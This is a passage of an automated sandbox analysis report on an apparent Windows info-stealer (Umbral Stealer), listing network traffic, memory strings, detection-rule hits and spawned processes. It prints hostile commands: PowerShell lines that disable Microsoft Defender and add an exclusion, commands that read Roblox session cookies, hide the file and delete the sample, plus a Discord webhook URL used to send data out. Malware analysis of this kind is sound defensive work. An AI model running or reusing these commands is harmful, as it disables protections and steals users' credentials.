    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=e33ff842533011efbe60b67178f48d0ebfbd2fc0e724b666922ca10fb71189111e3b4659a738b6f2d176e07ba6c3b9c8; Expires=Sat, 04-Aug-2029 13:44:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=2cb54a56125b2ec73133bde1a3ab9d05c16a5180-1722865490; path=/; domain=.discord.com; HttpOnly; Secure; Sam
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 05 Aug 2024 13:44:52 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: close
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1722865493
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNW9pdtjvblLioLWZUfboMySiwBFgHK6dpv%2FHooofDFjLL8AKn2Af75Xn3f%2BjAbBvlW98v7%2FLlnH228kDCKSOr3cAjA%2B6wckKePXKI49EnuBYKvG4GsWJbunFkGQ6o40EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Server: cloudflare
    CF-RAY: 8ae739693891c470-EWR
    Body: {"message": "Unknown Webhook", "code": 10015}
Source: powershell.exe, 00000005.00000002.1765168613.000001D36A810000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.1766639509.000001D36A990000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.1767821845.000001D36AB66000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoK
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com
Source: zamPeEkHWr.exe, kaS9T.scr.0.dr; String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/json/?fields=225545P
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB0357000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: zamPeEkHWr.exe, kaS9T.scr.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ptb.discord.com
Source: powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1740029520.000001D300228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1740029520.000001D300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778231738.000001138001D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC4D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE595B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002491F651000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: kaS9T.scr.0.dr; String found in binary or memory: https://discord.com/api/v10/users/
Source: zamPeEkHWr.exe, kaS9T.scr.0.dr; String found in binary or memory: https://discordapp.com/api/v9/users/
Source: kaS9T.scr.0.dr; String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.m
Source: powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.microsof
Source: powershell.exe, 00000008.00000002.1792975353.00000113FEC8D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://go.microsoft.cogDy
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com/generate_204
Source: zamPeEkHWr.exe, kaS9T.scr.0.dr; String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://oneget.orgX
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ptb.discord.com
Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown; Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49740 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile written: C:\Windows\System32\drivers\etc\hosts

                        System Summary

                        Source: zamPeEkHWr.exe, type: SAMPLEMatched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPEDMatched rule: Detects executables attempting to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8C21500_2_00007FFD9B8C2150
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8C20D80_2_00007FFD9B8C20D8
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B88B8350_2_00007FFD9B88B835
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B88A3A00_2_00007FFD9B88A3A0
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3C3910_2_00007FFD9BA3C391
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3E3770_2_00007FFD9BA3E377
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA403000_2_00007FFD9BA40300
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3300D0_2_00007FFD9BA3300D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA467E10_2_00007FFD9BA467E1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA406460_2_00007FFD9BA40646
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA33D610_2_00007FFD9BA33D61
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4356A0_2_00007FFD9BA4356A
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3DCF20_2_00007FFD9BA3DCF2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA33D4D0_2_00007FFD9BA33D4D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA45C810_2_00007FFD9BA45C81
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA403C00_2_00007FFD9BA403C0
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA423170_2_00007FFD9BA42317
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA452F20_2_00007FFD9BA452F2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3628E0_2_00007FFD9BA3628E
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4A29D0_2_00007FFD9BA4A29D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA332000_2_00007FFD9BA33200
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA332580_2_00007FFD9BA33258
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA451750_2_00007FFD9BA45175
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA328D50_2_00007FFD9BA328D5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA367C50_2_00007FFD9BA367C5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA326950_2_00007FFD9BA32695
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA305F50_2_00007FFD9BA305F5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA40E520_2_00007FFD9BA40E52
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3A62F0_2_00007FFD9BA3A62F
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3BE320_2_00007FFD9BA3BE32
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4A4FA0_2_00007FFD9BA4A4FA
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA424FA0_2_00007FFD9BA424FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9630E95_2_00007FFD9B9630E9
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668698301.000001EAAE5AC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs zamPeEkHWr.exe
                        Source: zamPeEkHWr.exeBinary or memory string: OriginalFilename vs zamPeEkHWr.exe
                        Source: zamPeEkHWr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: zamPeEkHWr.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                        Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                        Source: zamPeEkHWr.exe, ----.csBase64 encoded string: 'h2lD2M3Hil/M+G/i8Tdt1a/5V858USNKJQJotLljPaZwLNm7Aplo/Hwtz1srHmnrQ2BERt7FjnGuNt7uzZsYULUA8sD3ubBYy39OXFgV6IMOKfqyulJwnxP0pPjd9gk8BpmeKeHdYfl5lqmGWM7d4DH7mm3Btx2fyaKkfJ7364ucXLsEQbbw0CozPsS3'
                        Source: zamPeEkHWr.exe, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: kaS9T.scr.0.dr, ----.csBase64 encoded string: 'h2lD2M3Hil/M+G/i8Tdt1a/5V858USNKJQJotLljPaZwLNm7Aplo/Hwtz1srHmnrQ2BERt7FjnGuNt7uzZsYULUA8sD3ubBYy39OXFgV6IMOKfqyulJwnxP0pPjd9gk8BpmeKeHdYfl5lqmGWM7d4DH7mm3Btx2fyaKkfJ7364ucXLsEQbbw0CozPsS3'
                        Source: kaS9T.scr.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: kaS9T.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: kaS9T.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: zamPeEkHWr.exe, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: zamPeEkHWr.exe, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@40/23@3/2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zamPeEkHWr.exe.log
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeMutant created: \Sessions\1\BaseNamedObjects\PIYchE5GS1Ee0FryJ8gN
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\Users\user\AppData\Local\Temp\9mnNSrbpbgmC2pt
                        Source: zamPeEkHWr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zamPeEkHWr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB065D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2378470503.000001EAC8C43000.00000004.00000020.00020000.00000000.sdmp, ArtZhN3x4FUP6qs.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zamPeEkHWr.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile read: C:\Users\user\Desktop\zamPeEkHWr.exe
                        Source: unknownProcess created: C:\Users\user\Desktop\zamPeEkHWr.exe "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
